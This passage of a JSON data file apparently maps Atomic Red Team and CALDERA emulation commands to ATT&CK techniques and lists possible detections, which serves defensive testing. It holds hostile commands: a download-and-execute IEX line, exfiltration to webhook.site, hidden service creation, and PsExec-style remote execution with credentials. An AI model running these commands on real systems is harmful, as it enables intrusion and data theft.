\"malicious\" .jse file\n", + "type": "String", + "default": "C:\\Users\\Public\\art.jse" + }, + "ms_product": { + "description": "Maldoc application Word or Excel", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"#{jse_path}`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"#{ms_product}\"\n", + "cleanup_command": "Remove-Item #{jse_path} -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as 
netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1567", + "command_list": [ + "$path = resolve-path \"c:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\ConfigSecurityPolicy.exe\"\n& $path[0] c:\\temp\\config.xml \"https://webhook.site?d=sensitive-data-here\"\n" + ], + "commands": [ + { + "command": "$path = resolve-path \"c:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\ConfigSecurityPolicy.exe\"\n& $path[0] c:\\temp\\config.xml \"https://webhook.site?d=sensitive-data-here\"\n", + "source": "atomics/T1567/T1567.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Web Service" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1567", + "display_name": 
"Exfiltration Over Web Service", + "atomic_tests": [ + { + "name": "Data Exfiltration with ConfigSecurityPolicy", + "auto_generated_guid": "5568a8f4-a8b1-4c40-9399-4969b642f122", + "description": "Exfiltration of data using ConfigSecurityPolicy.exe\nhttps://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-4d9c6e43dacf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$path = resolve-path \"c:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\ConfigSecurityPolicy.exe\"\n& $path[0] c:\\temp\\config.xml \"https://webhook.site?d=sensitive-data-here\"\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + 
"https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1569.001", + "command_list": [ + "launchctl submit -l #{label_name} -- /System/Applications/Calculator.app/Contents/MacOS/Calculator\n", + "launchctl submit -l evil -- #{executable_path}\n" + ], + "commands": [ + { + "command": "launchctl submit -l #{label_name} -- /System/Applications/Calculator.app/Contents/MacOS/Calculator\n", + "source": "atomics/T1569.001/T1569.001.yaml", + "name": "Atomic Red Team Test - System Services: Launchctl" + }, + { + "command": "launchctl submit -l evil -- #{executable_path}\n", + "source": "atomics/T1569.001/T1569.001.yaml", + "name": "Atomic Red Team Test - System Services: Launchctl" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1569.001", + "display_name": "System Services: Launchctl", + "atomic_tests": [ + { + "name": "Launchctl", + "auto_generated_guid": "6fb61988-724e-4755-a595-07743749d4e2", + "description": "Utilize launchctl\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "executable_path": { + "description": "Path of the executable to run.", + "type": "Path", + "default": "/System/Applications/Calculator.app/Contents/MacOS/Calculator" + }, + "label_name": { + "description": "Path of the executable to run.", + "type": "String", + "default": "evil" + } + }, + "executor": { + "command": "launchctl submit -l #{label_name} -- #{executable_path}\n", + "cleanup_command": "launchctl remove #{label_name}\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or 
script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1569.002", + "command_list": [ + "sc.exe create ARTService binPath= \"#{executable_command}\"\nsc.exe start ARTService\nsc.exe delete ARTService\n", + "sc.exe create #{service_name} binPath= \"%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt\"\nsc.exe start #{service_name}\nsc.exe delete #{service_name}\n", + "#{psexec_exe} \\\\localhost -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "#{psexec_exe} \\\\#{remote_host} -u DOMAIN\\Administrator -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "#{psexec_exe} \\\\#{remote_host} -u #{user_name} -p P@ssw0rd1 -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "C:\\PSTools\\PsExec.exe \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula 
\"C:\\Windows\\System32\\calc.exe\"\n", + "psexec.py '#{domain}/#{username}:#{password}@127.0.0.1' '#{command}'\n", + "psexec.py '#{domain}/Administrator:#{password}@#{remote_host}' '#{command}'\n", + "psexec.py '/#{username}:#{password}@#{remote_host}' '#{command}'\n", + "psexec.py '#{domain}/#{username}:P@ssw0rd1@#{remote_host}' '#{command}'\n", + "psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' 'whoami'\n", + "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n" + ], + "commands": [ + { + "command": "sc.exe create ARTService binPath= \"#{executable_command}\"\nsc.exe start ARTService\nsc.exe delete ARTService\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "sc.exe create #{service_name} binPath= \"%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt\"\nsc.exe start #{service_name}\nsc.exe delete #{service_name}\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "#{psexec_exe} \\\\localhost -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "#{psexec_exe} \\\\#{remote_host} -u DOMAIN\\Administrator -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "#{psexec_exe} \\\\#{remote_host} -u #{user_name} -p P@ssw0rd1 
-accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "C:\\PSTools\\PsExec.exe \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/#{username}:#{password}@127.0.0.1' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/Administrator:#{password}@#{remote_host}' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '/#{username}:#{password}@#{remote_host}' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/#{username}:P@ssw0rd1@#{remote_host}' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' 'whoami'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n", + "source": "data/abilities/execution/95727b87-175c-4a69-8c7a-a5d82746a753.yml", + "name": "Create a service named 
\"sandsvc\" to execute remote 54ndc57 binary named \"s4ndc4t.exe\"" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1569.002", + "display_name": "System Services: Service Execution", + "atomic_tests": [ + { + "name": "Execute a Command as a Service", + "auto_generated_guid": "2382dee2-a75f-49aa-9378-f52df6ed3fb1", + "description": "Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.\n\nUpon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "Name of service to create", + "type": "String", + "default": "ARTService" + }, + "executable_command": { + "description": "Command to execute as a service", + "type": "String", + "default": "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt" + } + }, + "executor": { + "command": "sc.exe create #{service_name} binPath= \"#{executable_command}\"\nsc.exe start #{service_name}\nsc.exe delete #{service_name}\n", + "cleanup_command": "del C:\\art-marker.txt >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Use PsExec to execute a command on a remote host", + "auto_generated_guid": "873106b7-cfed-454b-8680-fa9f6400431c", + "description": "Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments\nWill start a process on a remote host.\n\nUpon successful execution, cmd will utilize psexec.exe to spawn 